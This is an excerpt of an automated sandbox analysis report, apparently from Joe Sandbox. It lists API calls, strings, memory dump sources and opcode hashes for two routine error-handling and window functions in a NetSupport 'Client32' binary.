                                                                                      • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                      • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                      • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                      Function 1110F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                      • API String ID: 2400454052-4183089485
                                                                                      • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                      • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                      • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
                                                                                      Function 11153500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowTextLengthA.USER32(00000000), ref: 11153524
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115350E
                                                                                      • m_hWnd, xrefs: 11153513
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 67735064-2830328467
                                                                                      • Opcode ID: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                      • Instruction ID: 41066489dfbac7b1bedb0840a1a625780406ac6dbed52086b597086e3eac16ab
                                                                                      • Opcode Fuzzy Hash: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                      • Instruction Fuzzy Hash: 5FD022B5B69229ABC31096A1EC84FC1B3849B0832CF011834F03553400E660B8C08341